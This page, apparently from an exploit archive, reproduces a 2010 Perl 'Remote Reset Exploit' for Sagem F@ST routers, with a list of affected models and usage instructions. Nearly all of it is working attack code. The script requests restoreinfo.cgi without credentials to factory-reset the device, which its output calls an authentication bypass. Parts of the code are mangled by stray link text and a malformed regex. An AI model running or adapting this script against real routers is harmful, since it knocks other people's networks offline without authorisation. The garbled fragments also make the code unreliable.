Home / os / winme

Sagem Routers Remote Reset Exploit

Posted on 04 March 2010

================================== Sagem Routers Remote Reset Exploit ================================== #!/usr/bin/perl # Exploit Title: Sagem routers Remote Reset Exploit # Date: 04/03/2010 # Author: AlpHaNiX # Software Link: null # Version: Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404 # Tested on: Sagem F@ST 2404 # Code : use HTTP::Request; use HTTP::Headers; use LWP::UserAgent; system('cls'); if (@ARGV != 1) { header();help(); exit(); } else{ if ($ARGV[0] =~ /http:/// ) { $ipz = $ARGV[0]."/"; } else { $ipz = "http://".$ARGV[0]."/";$ip=$ARGV[0] } header(); print "[+] Working on $ip .. "; exploit(); sub help() { print " [X] the target must be sagem rooter main ip adress ". "[X] affected Versions : Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404) ". "[X] Usage : perl $0 target ". "[X] Example : ./exploit.pl<http://exploit.pl> 192.168.1.1 "; } sub header() { print " [+]====================================[+] ". "[+] Sagem routers Remote Reset Exploit [+] ". "[+] Found And Exploit By AlpHaNiX [+] ". "[+] Contact : AlpHa[at]Hacker[dot]Bz [+] ". "[+] HomePage : NullArea.Net [+] ". "[+]====================================[+] " } sub exploit() { my $target = $ipz."restoreinfo.cgi" ; my $request = HTTP::Request->new(GET=>$target); my $useragent = LWP::UserAgent->new(); my $response = $useragent->request($request); if($response->content =~ m/<HTML><HEAD><TITLE>401 Unauthorized</TITLE></HEAD>/i && $response->content =~ m/<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized</H4>/ && $response->content =~ m/<ADDRESS><A HREF="http://www.acme.com<http://www.acme.com>/software/micro_httpd/">micro_httpd</A></ADDRESS>/ ) { print "[+] Authentication bypassed ! " ; print "[+] Exploited , $ip is restored" ; } else { print "[+] Please make sure you entered real sagem router ip " ; } } } # ~ - [ [ : Inj3ct0r : ] ]

 

TOP